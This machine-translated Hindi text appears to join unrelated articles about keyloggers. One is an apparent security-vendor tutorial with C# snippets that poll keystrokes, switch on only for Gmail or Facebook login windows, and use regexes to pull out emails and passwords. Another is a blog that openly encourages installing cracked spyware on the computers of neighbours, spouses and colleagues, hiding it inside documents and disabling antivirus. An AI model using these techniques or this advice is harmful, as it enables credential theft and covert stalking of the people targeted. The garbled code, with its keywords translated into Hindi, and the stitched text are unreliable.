प्रोग्राम को विजुअल स्टूडियो 2013 में आरटीएल के बिना संकलित किया गया है। इस प्रकार, हमें निष्पादन योग्य फ़ाइल का एक छोटा आकार और डिबग संस्करण में निर्माण की असंभवता मिलती है। डेटा उसी निर्देशिका में लॉग फ़ाइल में लिखा जाता है जहां .exe फ़ाइल स्थित है। सुविधा के लिए, लकड़हारा हर बार रिकॉर्ड करने पर एक नई फ़ाइल बनाता है, कुंजी दबाने का समय रिकॉर्ड करता है, उस विंडो का नाम जिसमें अक्षर दर्ज किए गए थे, और LSHIFT+RSHIFT दबाकर रुक जाता है। यह स्निफ़र पूर्ण कीबोर्ड के लिए अनुकूलित नहीं है; कुछ सेवा कुंजियाँ, जैसे F13 या NUM_LOCK, को इस प्रकार लिखा जा सकता है। मुझे लगता है कि जो लोग C/C++ से थोड़ा भी परिचित हैं वे इन्हें आसानी से जोड़ सकते हैं। इसके अलावा, आप अपने अनुरूप कोड को पूरी तरह से बदल सकते हैं।

हैकर जगत को हमलावरों के तीन समूहों में विभाजित किया जा सकता है:


1) "स्किड्स" (स्क्रिप्ट किडीज़) - छोटे नौसिखिया हैकर जो कोड और उपयोगिताओं के प्रसिद्ध टुकड़े एकत्र करते हैं और कुछ सरल मैलवेयर बनाने के लिए उनका उपयोग करते हैं।


2) "खरीदार" बेईमान उद्यमी, किशोर और अन्य रोमांच-चाहने वाले हैं। वे इंटरनेट पर ऐसे सॉफ़्टवेयर लिखने के लिए सेवाएँ खरीदते हैं, इसकी मदद से विभिन्न निजी जानकारी एकत्र करते हैं और संभवतः इसे दोबारा बेचते हैं।


3) "ब्लैक हैट कोडर्स" - प्रोग्रामिंग गुरु और वास्तुकला विशेषज्ञ। वे नोटपैड में कोड लिखते हैं और स्क्रैच से नए कारनामे विकसित करते हैं।


क्या अच्छे प्रोग्रामिंग कौशल वाला कोई व्यक्ति अंतिम व्यक्ति बन सकता है? मुझे नहीं लगता कि आप कुछ DEFCON सत्रों में भाग लेने के बाद रेगिन (लिंक) जैसा कुछ बनाना शुरू करेंगे। दूसरी ओर, मेरा मानना ​​है कि एक सूचना सुरक्षा अधिकारी को कुछ अवधारणाओं पर महारत हासिल करनी चाहिए जिन पर मैलवेयर बनाया जाता है।


सूचना सुरक्षा कर्मियों को इन संदिग्ध कौशलों की आवश्यकता क्यों है?


आपके दुश्मन को पता है। जैसा कि हमने इनसाइड आउट ब्लॉग पर चर्चा की, आपको उसे रोकने के लिए अपराधी की तरह सोचने की ज़रूरत है। मैं वरोनिस में एक सूचना सुरक्षा विशेषज्ञ हूं और मेरे अनुभव से, आप इस कला में मजबूत होंगे यदि आप समझते हैं कि एक हमलावर क्या कदम उठाएगा। इसलिए मैंने मैलवेयर के पीछे के विवरण और हैकिंग टूल के विभिन्न परिवारों के बारे में पोस्ट की एक श्रृंखला शुरू करने का निर्णय लिया। एक बार जब आपको एहसास हो जाए कि पता न चल पाने वाला सॉफ़्टवेयर बनाना कितना आसान है, तो आप अपने उद्यम की सुरक्षा नीतियों पर पुनर्विचार करना चाहेंगे। अब और अधिक विस्तार से.


इस अनौपचारिक "हैकिंग 101" कक्षा के लिए, आपको कुछ प्रोग्रामिंग ज्ञान (सी# और जावा) और विंडोज आर्किटेक्चर की बुनियादी समझ की आवश्यकता है। ध्यान रखें कि वास्तव में मैलवेयर C/C++/डेल्फ़ी में लिखा गया है ताकि फ्रेमवर्क पर निर्भर न रहें।


keylogger


कीलॉगर एक सॉफ्टवेयर या किसी प्रकार का भौतिक उपकरण है जो किसी क्षतिग्रस्त मशीन पर कीस्ट्रोक्स को रोक सकता है और याद रख सकता है। इसे कीबोर्ड पर प्रत्येक कीस्ट्रोक के लिए एक डिजिटल जाल के रूप में सोचा जा सकता है।
अक्सर यह फ़ंक्शन अन्य, अधिक जटिल सॉफ़्टवेयर में कार्यान्वित किया जाता है, उदाहरण के लिए, ट्रोजन (रिमोट एक्सेस ट्रोजन आरएटीएस), जो हमलावर को इंटरसेप्ट किए गए डेटा की डिलीवरी सुनिश्चित करता है। हार्डवेयर कीलॉगर्स भी हैं, लेकिन वे कम आम हैं क्योंकि... मशीन तक सीधी भौतिक पहुंच की आवश्यकता है।


हालाँकि, बुनियादी कीलॉगर फ़ंक्शन बनाना प्रोग्राम करना काफी आसान है। चेतावनी। यदि आप निम्नलिखित में से कोई भी प्रयास करना चाहते हैं, तो सुनिश्चित करें कि आपके पास अनुमतियाँ हैं और आप मौजूदा वातावरण को बाधित नहीं कर रहे हैं, और यह सब एक अलग वीएम पर करना सबसे अच्छा है। इसके बाद, इस कोड को अनुकूलित नहीं किया जाएगा, मैं आपको केवल कोड की पंक्तियाँ दिखाऊंगा जो कार्य को पूरा कर सकती हैं, यह सबसे सुंदर या इष्टतम तरीका नहीं है। और अंत में, मैं आपको यह नहीं बताऊंगा कि किसी कीलॉगर को रिबूट के प्रति प्रतिरोधी कैसे बनाया जाए या विशेष प्रोग्रामिंग तकनीकों का उपयोग करके इसे पूरी तरह से ज्ञानीभूत बनाने का प्रयास कैसे किया जाए, साथ ही पता चलने पर भी इसे हटाए जाने से कैसे बचाया जाए।



कीबोर्ड से कनेक्ट करने के लिए आपको C# में केवल 2 पंक्तियों का उपयोग करना होगा:


1. 2. 3. सार्वजनिक स्थैतिक बाहरी int GetAsyncKeyState(Int32 i);

आप MSDN पर GetAsyncKeyState फ़ंक्शन के बारे में अधिक जान सकते हैं:


समझने के लिए: यह फ़ंक्शन निर्धारित करता है कि कॉल के समय कोई कुंजी दबाई गई थी या जारी की गई थी और क्या इसे पिछली कॉल के बाद दबाया गया था। अब हम कीबोर्ड से डेटा प्राप्त करने के लिए इस फ़ंक्शन को लगातार कॉल करते हैं:


1. जबकि (सत्य) 2. ( 3. थ्रेड.स्लीप(100); 4. for (Int32 i = 0; i< 255; i++) 5. { 6. int state = GetAsyncKeyState(i); 7. if (state == 1 || state == -32767) 8. { 9. Console.WriteLine((Keys)i); 10. 11. } 12. } 13. }

यहाँ क्या चल रहा है? यह लूप प्रत्येक कुंजी की स्थिति निर्धारित करने के लिए प्रत्येक 100ms पर मतदान करेगा। यदि उनमें से एक को दबाया जाता है (या दबाया गया है), तो इसके बारे में एक संदेश कंसोल पर प्रदर्शित होगा। वास्तविक जीवन में, यह डेटा बफ़र किया जाता है और हमलावर को भेजा जाता है।


स्मार्ट कीलॉगर

रुको, क्या सभी एप्लिकेशन से सारी जानकारी हटाने का प्रयास करने का कोई मतलब है?
उपरोक्त कोड वर्तमान में फोकस वाली किसी भी विंडो और इनपुट फ़ील्ड से कच्चे कीबोर्ड इनपुट को खींचता है। यदि आपका लक्ष्य क्रेडिट कार्ड नंबर और पासवर्ड है, तो यह दृष्टिकोण बहुत प्रभावी नहीं है। वास्तविक दुनिया के परिदृश्यों के लिए, जब ऐसे कीलॉगर्स को सैकड़ों या हजारों मशीनों पर निष्पादित किया जाता है, तो बाद में डेटा पार्सिंग बहुत लंबी और अंततः अर्थहीन हो सकती है, क्योंकि किसी हमलावर के लिए मूल्यवान जानकारी तब तक पुरानी हो सकती है।


आइए मान लें कि मैं लाइक बेचने के लिए फेसबुक या जीमेल क्रेडेंशियल्स हासिल करना चाहता हूं। फिर एक नया विचार यह है कि कीलॉगिंग को तभी सक्रिय किया जाए जब ब्राउज़र विंडो सक्रिय हो और पेज शीर्षक में जीमेल या फेसबुक शब्द हो। इस पद्धति का उपयोग करके मैं क्रेडेंशियल प्राप्त करने की संभावना बढ़ाता हूं।


कोड का दूसरा संस्करण:


1. जबकि (सत्य) 2. ( 3. IntPtr हैंडल = GetForegroundWindow(); 4. if (GetWindowText(हैंडल, बफ़, वर्ण) > 0) 5. ( 6. स्ट्रिंग लाइन = buff.ToString(); 7. यदि (line.Contains("Gmail")|| लाइन.Contains("Facebook - लॉग इन या साइन अप")) 8. ( 9. //कीबोर्ड चेक 10. ) 11. ) 12. थ्रेड.स्लीप(100); 13. )

यह स्निपेट प्रत्येक 100ms पर सक्रिय विंडो का पता लगाएगा। यह GetForegroundWindow फ़ंक्शन (MSDN पर अधिक जानकारी) का उपयोग करके किया जाता है। पेज का शीर्षक बफ़ वेरिएबल में संग्रहीत है, यदि इसमें जीमेल या फेसबुक है, तो कीबोर्ड स्कैनिंग खंड को कहा जाता है।


ऐसा करके, हमने यह सुनिश्चित किया कि कीबोर्ड केवल तभी स्कैन किया जाए जब फेसबुक और जीमेल साइटों पर ब्राउज़र विंडो खुली हो।


एक और भी अधिक स्मार्ट कीलॉगर


आइए मान लें कि हमलावर हमारे जैसे कोड का उपयोग करके डेटा प्राप्त करने में सक्षम था। आइए यह भी मान लें कि वह इतना महत्वाकांक्षी है कि दसियों या सैकड़ों हजारों मशीनों को संक्रमित कर सकता है। परिणाम: गीगाबाइट टेक्स्ट वाली एक विशाल फ़ाइल जिसमें आवश्यक जानकारी अभी भी ढूंढी जानी है। अब रेगुलर एक्सप्रेशन या रेगेक्स से परिचित होने का समय आ गया है। यह कुछ टेम्प्लेट बनाने और दिए गए टेम्प्लेट के अनुपालन के लिए टेक्स्ट को स्कैन करने के लिए एक छोटी भाषा की तरह है। आप यहां और बहुत कुछ मिल सकता है।


सरल बनाने के लिए, मैं तुरंत तैयार अभिव्यक्ति दूंगा जो लॉगिन नाम और पासवर्ड से मेल खाती है:


1. //डाक पते की तलाश में 2. ^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"* + \-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.) ( 3)(1,3)))$ 3. 4. 5. //पासवर्ड ढूंढ रहे हैं 6. (?=^.(6,)$)(?=.*\d)(?=.*)

ये अभिव्यक्तियाँ यहाँ एक संकेत के रूप में हैं कि इनका उपयोग करके क्या किया जा सकता है। रेगुलर एक्सप्रेशन का उपयोग करके, आप किसी भी संरचना को खोज सकते हैं (और ढूंढ सकते हैं!) जिसका एक विशिष्ट और अपरिवर्तनीय प्रारूप है, उदाहरण के लिए, पासपोर्ट नंबर, क्रेडिट कार्ड, खाते और यहां तक ​​कि पासवर्ड भी।
वास्तव में, नियमित अभिव्यक्ति सबसे अधिक पढ़ने योग्य प्रकार का कोड नहीं है, लेकिन यदि पाठ पार्सिंग कार्य हैं तो वे प्रोग्रामर के सबसे अच्छे दोस्तों में से एक हैं। जावा, सी#, जावास्क्रिप्ट और अन्य लोकप्रिय भाषाओं में पहले से ही तैयार फ़ंक्शन हैं जिनमें आप नियमित रेगुलर एक्सप्रेशन पास कर सकते हैं।


C# के लिए यह इस तरह दिखता है:


1. रेगेक्स पुनः = नया रेगेक्स (@"^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"* +\-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.) (3)(1,3)))$"); 2. रेगेक्स re2 = नया रेगेक्स (@"(?=^.(6,)$)(?=.*\d)(?=.*)"); 3. स्ट्रिंग ईमेल = " [ईमेल सुरक्षित]"; 4. स्ट्रिंग पास = "abcde3FG"; 5. मिलान परिणाम = पुनः मिलान(ईमेल); 6. मिलान परिणाम2 = पुनः2. मिलान(पास);

जहां पहली अभिव्यक्ति (re) किसी भी ईमेल से मेल खाएगी, और दूसरी (re2) 6 अक्षरों से अधिक किसी भी अल्फ़ान्यूमेरिक संरचना से मेल खाएगी।


मुफ़्त और पूरी तरह से ज्ञानी नहीं


मेरे उदाहरण में, मैंने 30 मिनट में ऐसा कीलॉगर बनाने के लिए विज़ुअल स्टूडियो का उपयोग किया - आप अपने पसंदीदा वातावरण का उपयोग कर सकते हैं।
यदि मैं एक वास्तविक हमलावर होता, तो मैं कुछ वास्तविक लक्ष्य (बैंकिंग साइट्स, सोशल नेटवर्क इत्यादि) को निशाना बनाता और इन लक्ष्यों से मेल खाने के लिए कोड को संशोधित करता। निःसंदेह, मैं हमारे कार्यक्रम के साथ एक नियमित चालान या अन्य अनुलग्नक के रूप में एक फ़िशिंग ईमेल अभियान भी चलाऊंगा।


एक प्रश्न बना हुआ है: क्या ऐसे सॉफ़्टवेयर वास्तव में सुरक्षा कार्यक्रमों द्वारा पहचाने नहीं जा सकेंगे?


मैंने अपना कोड संकलित किया और वायरसटोटल वेबसाइट पर exe फ़ाइल की जाँच की। यह एक वेब-आधारित उपकरण है जो आपके द्वारा डाउनलोड की गई फ़ाइल के हैश की गणना करता है और इसे ज्ञात वायरस के डेटाबेस के विरुद्ध खोजता है। आश्चर्य! स्वाभाविक रूप से कुछ भी नहीं मिला.



यह मुख्य बिंदु है! आप हमेशा कोड को बदल सकते हैं और विकसित कर सकते हैं, हमेशा खतरे वाले स्कैनर से कुछ कदम आगे रह सकते हैं। यदि आप अपना स्वयं का कोड लिखने में सक्षम हैं तो यह निश्चित है कि इसका पता नहीं लगाया जा सकेगा। आप इस पेज पर पूरा विश्लेषण पढ़ सकते हैं।


इस लेख का मुख्य उद्देश्य यह दिखाना है कि अकेले एंटीवायरस का उपयोग करके आप अपने उद्यम में पूरी तरह से सुरक्षा सुनिश्चित नहीं कर पाएंगे। संभावित दुर्भावनापूर्ण कार्यों की पहचान करने के लिए सभी उपयोगकर्ताओं और यहां तक ​​कि सेवाओं के कार्यों का अधिक गहन मूल्यांकन आवश्यक है।


अगले लेख में मैं दिखाऊंगा कि ऐसे सॉफ़्टवेयर का वास्तव में पता न चल सकने वाला संस्करण कैसे बनाया जाए।

हममें से कौन कम से कम एक बार एक अच्छे हैकर की तरह महसूस नहीं करना चाहता और कम से कम कुछ तोड़ना नहीं चाहता? :) यदि नहीं, तो आइए बात करते हैं कि आपके मेल/सोशल नेटवर्क से पासवर्ड प्राप्त करना कितना अच्छा होगा। एक दोस्त, पत्नी/पति, रूममेट के नेटवर्क के बारे में हर किसी ने कम से कम एक बार सोचा। :) हाँ, और आख़िरकार आपको कहीं न कहीं से तो शुरुआत करनी ही होगी! हमलों (हैकिंग) के एक महत्वपूर्ण हिस्से में पीड़ित के कंप्यूटर को तथाकथित कीलॉगर्स (स्पाइवेयर) से संक्रमित करना शामिल है।

तो, आज के लेख में हम बात करेंगे कि क्या हैं विंडोज़-आधारित कंप्यूटरों की निगरानी के लिए निःशुल्क कार्यक्रम, जहां आप उनके पूर्ण संस्करण डाउनलोड कर सकते हैं, किसी पीड़ित के कंप्यूटर को उनसे कैसे संक्रमित किया जा सकता है, और उनके उपयोग की विशेषताएं क्या हैं।

लेकिन पहले, थोड़ा परिचय.

कीलॉगर्स क्या हैं और उनकी आवश्यकता क्यों है?

मुझे लगता है कि आपने स्वयं ही अनुमान लगा लिया होगा कि यह क्या है। एक नियम के रूप में, वे एक प्रकार के प्रोग्राम होते हैं जो पीड़ित के कंप्यूटर पर छिपा हुआ होता है (हालाँकि यह हमेशा मामला नहीं होता है), जिसके बाद यह इस नोड पर बिल्कुल सभी कीस्ट्रोक्स को रिकॉर्ड करता है। इसके अलावा, स्वयं क्लिक के अलावा, निम्नलिखित आमतौर पर दर्ज किया जाता है: क्लिक (क्रिया) की तिथि और समय और वह प्रोग्राम जिसमें ये क्रियाएं की गईं (ब्राउज़र, वेबसाइट पते सहित (हुर्रे, हम तुरंत देखते हैं कि पासवर्ड क्या हैं) के लिए हैं!); स्थानीय अनुप्रयोग; सिस्टम सेवाएँ (विंडोज़ लॉगिन पासवर्ड सहित), आदि)।

यहां से एक समस्या तुरंत दिखाई देती है: मुझे कुछ मिनटों के लिए अपने पड़ोसी के कंप्यूटर तक पहुंच मिल गई और मैं वीके से उसका पासवर्ड प्राप्त करना चाहता हूं! मैंने चमत्कार प्रोग्राम स्थापित किया और कंप्यूटर वापस कर दिया। मैं बाद में पासवर्ड कैसे देख सकता हूँ? क्या आप उससे दोबारा कंप्यूटर लेने का कोई रास्ता खोज रहे हैं? अच्छी खबर यह है: आमतौर पर नहीं. अधिकांश कीलॉगर न केवल क्रियाओं के संपूर्ण संचित डेटाबेस को स्थानीय रूप से संग्रहीत करने में सक्षम हैं, बल्कि इसे दूरस्थ रूप से भेजने में भी सक्षम हैं। लॉग भेजने के लिए कई विकल्प हैं:

  • एक निश्चित ई-मेल (कई हो सकते हैं) सबसे सुविधाजनक विकल्प है;
  • एफ़टीपी सर्वर (जिसके पास यह है);
  • एसएमबी सर्वर (विदेशी, और बहुत सुविधाजनक नहीं)।
  • एक निश्चित फ्लैश ड्राइव (आप इसे पीड़ित के कंप्यूटर के यूएसबी पोर्ट में डालें, और सभी लॉग अदृश्य मोड में स्वचालित रूप से वहां कॉपी हो जाते हैं!)।

यह सब क्यों आवश्यक है? मुझे लगता है कि उत्तर स्वाभाविक है। पासवर्ड की साधारण चोरी के अलावा, कुछ कीलॉगर कई अन्य अच्छे काम भी कर सकते हैं:

  • निर्दिष्ट सामाजिक नेटवर्क में पत्राचार लॉग करना। नेटवर्क या त्वरित संदेशवाहक (उदाहरण के लिए, स्काइप)।
  • स्क्रीन के स्क्रीनशॉट ले रहा हूँ.
  • वेबकैम डेटा देखें/कैप्चर करें (जो बहुत दिलचस्प हो सकता है)।

कीलॉगर्स का उपयोग कैसे करें?

और यह एक कठिन प्रश्न है. आपको यह समझने की आवश्यकता है कि केवल एक सुविधाजनक, कार्यात्मक, अच्छा कीलॉगर ढूंढना ही पर्याप्त नहीं है।

इसलिए, एक जासूसी कार्यक्रम के सफलतापूर्वक कार्य करने के लिए क्या आवश्यक है?:

  • दूरस्थ कंप्यूटर तक प्रशासक की पहुंच।
    इसके अलावा, इसका मतलब जरूरी नहीं कि भौतिक पहुंच हो। आप इसे आरडीपी (रिमोट डेस्कटॉप सर्विस) के माध्यम से आसानी से एक्सेस कर सकते हैं; टीमव्यूअर; अम्मीएडमिन, आदि।
    एक नियम के रूप में, सबसे बड़ी कठिनाइयाँ इसी बिंदु से जुड़ी हैं। हालाँकि, मैंने हाल ही में विंडोज़ में व्यवस्थापक अधिकार कैसे प्राप्त करें, इसके बारे में एक लेख लिखा है।
  • अज्ञात ई-मेल/एफ़टीपी (जिससे आपकी पहचान नहीं होगी)।
    निःसंदेह, यदि आप अपने पड़ोसी के लिए आंटी शूरा को तोड़ रहे हैं, तो इस बिंदु को सुरक्षित रूप से छोड़ा जा सकता है। जैसा कि मामला है यदि आपके पास हमेशा पीड़ित का कंप्यूटर होता है (अफसोस, अपने भाई/बहन के पासवर्ड का पता लगाएं)।
  • कार्यशील एंटीवायरस/आंतरिक विंडोज़ सुरक्षा प्रणालियों का अभाव।
    अधिकांश सार्वजनिक कीलॉगर्स (जिसकी चर्चा नीचे की जाएगी) एंटीवायरस सॉफ़्टवेयर के विशाल बहुमत के लिए जाने जाते हैं (हालांकि ऐसे लॉगर वायरस हैं जो ओएस कर्नेल या सिस्टम ड्राइवर में निर्मित होते हैं, और एंटीवायरस अब उनका पता नहीं लगा सकते हैं या उन्हें नष्ट नहीं कर सकते हैं, भले ही उनके पास हो) उनका पता लगाया)। उपरोक्त के कारण, एंटी-वायरस सॉफ़्टवेयर, यदि कोई हो, को निर्दयतापूर्वक नष्ट करना होगा। एंटीवायरस के अलावा, विंडोज डिफेंडर जैसे सिस्टम (ये पहले विंडोज 7 और बाद में दिखाई दिए) भी हमारे स्पाइवेयर के लिए खतरा पैदा करते हैं। वे कंप्यूटर पर चल रहे सॉफ़्टवेयर में संदिग्ध गतिविधि का पता लगाते हैं। इनसे कैसे छुटकारा पाया जाए इसकी जानकारी आप गूगल पर आसानी से पा सकते हैं।

अन्य लोगों के पासवर्ड/पत्र-व्यवहार/फ़ोटो या जो कुछ भी आप अतिक्रमण करना चाहते हैं, उसे चुराने के क्षेत्र में आपकी सफलता के लिए शायद ये सभी आवश्यक और पर्याप्त शर्तें हैं।

स्पाइवेयर किस प्रकार के होते हैं और मैं उन्हें कहां से डाउनलोड कर सकता हूं?

तो, आइए उन मुख्य कीलॉगर्स की समीक्षा शुरू करें जिनका उपयोग मैंने अपने दैनिक अभ्यास में उनके पूर्ण संस्करणों के मुफ्त डाउनलोड के लिंक के साथ किया है (यानी, सभी संस्करण इस समय नवीनतम हैं (जिसका इलाज ढूंढना संभव है) और इसके साथ पहले से ही काम कर रहा है और दरारों का परीक्षण किया जा चुका है)।

0. चूहा!

रेटिंग (10 में से):

  • गुप्त: 10
  • सुविधा/प्रयोज्यता: 9
  • कार्यक्षमता: 8

यह सिर्फ एक बम है, कीलॉगर नहीं! कार्यशील स्थिति में इसमें 15-20 KB का समय लगता है। आश्चर्यचकित क्यों हों: यह पूरी तरह से असेंबली भाषा में लिखा गया है (अनुभवी प्रोग्रामर आँसू बहाते हैं) और ज्यादातर उत्साही हैकर्स द्वारा लिखा गया है, जिसके कारण इसकी गोपनीयता का स्तर बस आश्चर्यजनक है: यह ओएस कर्नेल स्तर पर काम करता है!

इसके अलावा, पैकेज में फाइलकनेक्टर शामिल है - एक मिनी-प्रोग्राम जो आपको इस कीलॉगर को बिल्कुल किसी भी प्रोग्राम से कनेक्ट करने की अनुमति देता है। परिणामस्वरूप, आपको लगभग उसी आकार का एक नया exe मिलता है, और जब लॉन्च किया जाता है, तो यह बिल्कुल उसी प्रोग्राम की तरह काम करता है जिसके साथ आपने इसे एक साथ चिपकाया था! लेकिन पहले लॉन्च के बाद, आपका कीलॉगर आपके द्वारा पहले निर्दिष्ट लॉग भेजने के मापदंडों के साथ अदृश्य मोड में स्वचालित रूप से इंस्टॉल हो जाएगा। सुविधाजनक, है ना?

सोशल इंजीनियरिंग के लिए एक उत्कृष्ट अवसर (फ्लैश ड्राइव पर किसी मित्र के लिए एक गेम फ़ाइल/प्रस्तुति लाएँ, या यहाँ तक कि सिर्फ एक वर्ड दस्तावेज़ (मैं आपको एक exe फ़ाइल बनाने का तरीका बताऊँगा जो किसी एक में एक विशिष्ट शब्द/एक्सेल फ़ाइल लॉन्च करती है) मेरे अगले लेख), लॉन्च, सब कुछ ठीक और अद्भुत है, लेकिन मित्र पहले से ही अदृश्य रूप से संक्रमित है!)। या आप बस इस फ़ाइल को किसी मित्र को मेल द्वारा भेजें (अधिमानतः इसे डाउनलोड करने के लिए एक लिंक, क्योंकि आधुनिक मेल सर्वर exe फ़ाइलें भेजने पर रोक लगाते हैं)। बेशक, इंस्टालेशन के दौरान एंटीवायरस से अभी भी खतरा है (लेकिन इंस्टालेशन के बाद यह मौजूद नहीं रहेगा)।

वैसे, कुछ अन्य तकनीकों की मदद से आप न केवल exe फ़ाइलों (जो अभी भी अधिक या कम उन्नत उपयोगकर्ताओं के बीच संदेह पैदा करते हैं) के साथ किसी भी छिपे हुए इंस्टॉलेशन वितरण (ये द रैट! और एलीट कीलॉगर में पाए जाते हैं) को एक साथ जोड़ सकते हैं। लेकिन साधारण वर्ड/एक्सेल और यहां तक ​​कि पीडीएफ फाइलों के साथ भी! एक साधारण पीडीएफ के बारे में कोई भी कभी कुछ नहीं सोचेगा, लेकिन ऐसा नहीं है! :) यह कैसे किया जाता है यह एक अलग लेख का विषय है। जो लोग विशेष रूप से उत्साही हैं वे फीडबैक फॉर्म के माध्यम से मुझे प्रश्न लिख सकते हैं। ;)

कुल मिलाकर, चूहा! बहुत लंबे समय तक और बहुत कुछ वर्णित किया जा सकता है। यह मुझसे कहीं बेहतर तरीके से किया गया. वहां एक डाउनलोड लिंक भी है.

1. विशिष्ट कीलॉगर

रेटिंग (10 में से):

  • गुप्त: 10
  • सुविधा/प्रयोज्यता: 9
  • कार्यक्षमता: 8

शायद अब तक बनाए गए सर्वश्रेष्ठ कीलॉगर्स में से एक। इसकी क्षमताओं में, मानक सेट (एप्लिकेशन/विंडोज़/साइट्स के संदर्भ में सभी क्लिकों का अवरोधन) के अलावा, तत्काल मैसेंजर संदेशों का अवरोधन, वेबकैम से चित्र, और यह भी शामिल है - जो बहुत महत्वपूर्ण है! - WinLogon सेवा पासवर्ड का अवरोधन। दूसरे शब्दों में, यह विंडोज़ लॉगिन पासवर्ड (डोमेन वाले सहित!) को इंटरसेप्ट करता है। यह सिस्टम ड्राइवर स्तर पर इसके काम और ओएस बूट चरण में भी लॉन्च के कारण संभव हुआ। इसी सुविधा के कारण, यह प्रोग्राम कैस्परोस्की और अन्य सभी एंटी-मैलवेयर सॉफ़्टवेयर दोनों के लिए पूरी तरह से अदृश्य रहता है। सच कहूं तो, मुझे ऐसा एक भी कीलॉगर नहीं मिला जो इसके लिए सक्षम हो।

हालाँकि, आपको अपने आप को बहुत अधिक धोखा नहीं देना चाहिए। इंस्टॉलर स्वयं एंटीवायरस द्वारा बहुत आसानी से पहचाना जाता है और इसे इंस्टॉल करने के लिए आपको व्यवस्थापक अधिकारों और सभी एंटीवायरस सेवाओं को अक्षम करने की आवश्यकता होगी। स्थापना के बाद, किसी भी स्थिति में सब कुछ ठीक से काम करेगा।

इसके अलावा, वर्णित सुविधा (ओएस कर्नेल स्तर पर काम करना) ओएस संस्करण के लिए आवश्यकताओं का परिचय देती है जिस पर कीलॉगर्स काम करेंगे। संस्करण 5-5.3 (जिनके लिंक नीचे दिए गए हैं) विंडोज 7 तक और इसमें शामिल सभी चीज़ों का समर्थन करता है। विन 8/10, साथ ही विंडोज सर्वर परिवार (2003/2008/2012) अब समर्थित नहीं हैं। वहाँ संस्करण 6 है, जो पूरी तरह से काम करता है, सहित। हालाँकि, जीत 8 और 10 पर, फटा हुआ संस्करण ढूँढना फिलहाल संभव नहीं है। संभवत: यह भविष्य में सामने आयेगा. इस बीच, आप ऊपर दिए गए लिंक से Elite keylogger 5.3 डाउनलोड कर सकते हैं।

इसमें कोई नेटवर्क ऑपरेशन मोड नहीं है, इसलिए यह नियोक्ताओं (अपने कर्मचारियों के कंप्यूटर की निगरानी के लिए) या लोगों के पूरे समूह द्वारा उपयोग के लिए उपयुक्त नहीं है।

एक महत्वपूर्ण बिंदु पूर्वनिर्धारित सेटिंग्स के साथ एक इंस्टॉलेशन वितरण बनाने की क्षमता है (उदाहरण के लिए, एक निर्दिष्ट ईमेल पते के साथ जहां लॉग भेजने की आवश्यकता होगी)। उसी समय, अंत में आपको एक वितरण किट मिलती है, जो लॉन्च होने पर, बिल्कुल कोई चेतावनी या विंडो प्रदर्शित नहीं करती है, और स्थापना के बाद यह स्वयं को नष्ट भी कर सकती है (यदि आप उपयुक्त विकल्प की जांच करते हैं)।

संस्करण 5 के कई स्क्रीनशॉट (यह दिखाने के लिए कि सब कुछ कितना सुंदर और सुविधाजनक है):

2. ऑल-इन-वन कीलॉगर।

रेटिंग (10 में से):

  • गुप्त: 3
  • सुविधा/प्रयोज्यता: 9
  • कार्यक्षमता: 8

यह भी बहुत-बहुत सुविधाजनक चीज़ है। कार्यक्षमता एलीट कीलॉगर के स्तर पर है। गोपनीयता से हालात बदतर हैं. Winlogon पासवर्ड अब इंटरसेप्ट नहीं किए जाते हैं, यह ड्राइवर नहीं है, और कर्नेल में निर्मित नहीं है। हालाँकि, यह सिस्टम और छिपी हुई AppData निर्देशिकाओं में स्थापित है, जो अनधिकृत उपयोगकर्ताओं के लिए इतनी आसानी से उपलब्ध नहीं है (उन लोगों के लिए नहीं जिनकी ओर से इसे स्थापित किया गया है)। फिर भी, एंटीवायरस देर-सबेर ऐसा सफलतापूर्वक कर लेते हैं, जिससे उपयोग किए जाने पर यह चीज़ विशेष रूप से विश्वसनीय और सुरक्षित नहीं रह जाती है, उदाहरण के लिए, काम पर अपने वरिष्ठों की जासूसी करने के लिए। ;) इसे किसी चीज़ से चिपकाना या एंटीवायरस से छिपाने के लिए कोड को एन्क्रिप्ट करना काम नहीं करेगा।

विन ओएस के किसी भी संस्करण पर काम करता है (जो अच्छा और व्यावहारिक है)।

बाकी सब कुछ ठीक है: यह सब कुछ लॉग करता है (विंडोज़ लॉगिन पासवर्ड को छोड़कर), इसे कहीं भी भेजता है (ई-मेल, एफ़टीपी, फिक्स्ड फ्लैश ड्राइव सहित)। सुविधा के मामले में भी सब कुछ बेहतरीन है.

3. स्पाईटेक स्पाईएजेंट।

रेटिंग (10 में से):

  • गुप्त: 4
  • सुविधा/प्रयोज्यता: 8
  • कार्यक्षमता: 10

संदिग्ध गोपनीयता के साथ, एक अच्छा कीलॉगर भी। समर्थित OS संस्करण भी सभी संभव हैं। कार्यक्षमता पिछले विकल्पों के समान है. एक निर्दिष्ट अवधि के बाद (या पूर्व निर्धारित तिथि तक पहुंचने पर) एक दिलचस्प आत्म-विनाश समारोह होता है।

इसके अलावा, वेबकैम से वीडियो रिकॉर्ड करना और माइक्रोफ़ोन से ध्वनि रिकॉर्ड करना संभव है, जो बहुत लोकप्रिय भी हो सकता है और जो पिछले दो प्रतिनिधियों के पास नहीं है।

ऑपरेशन का एक नेटवर्क मोड है, जो कंप्यूटर के पूरे नेटवर्क की निगरानी के लिए सुविधाजनक है। वैसे, स्टाफकॉप के पास यह है (एक उपयोगकर्ता - एक व्यक्ति के लिए इसकी बेकारता के कारण इसे समीक्षा में शामिल नहीं किया गया है)। शायद यह कार्यक्रम नियोक्ताओं के लिए अपने कर्मचारियों की जासूसी करने के लिए आदर्श है (हालांकि इस क्षेत्र में नेता बिना शर्त स्टाफकॉप और लैनएजेंट हैं - यदि आप एक कानूनी इकाई हैं, तो उनकी दिशा में देखना सुनिश्चित करें)। या अपनी संतानों पर नज़र रखने के लिए जो बैठकर "वयस्क साइटें" देखना पसंद करती हैं। वे। जहां आवश्यकता छुपाने की नहीं है, बल्कि निर्दिष्ट साइटों/कार्यक्रमों को अवरुद्ध करने के लिए सुविधा (खूबसूरत लॉग रिपोर्ट आदि का एक समूह सहित) और कार्यक्षमता की है (स्पाईएजेंट के पास भी है)।

4. स्पाइरिक्स पर्सनल मॉनिटर।

रेटिंग (10 में से):

  • गुप्त: 4
  • सुविधा/प्रयोज्यता: 6
  • कार्यक्षमता: 10

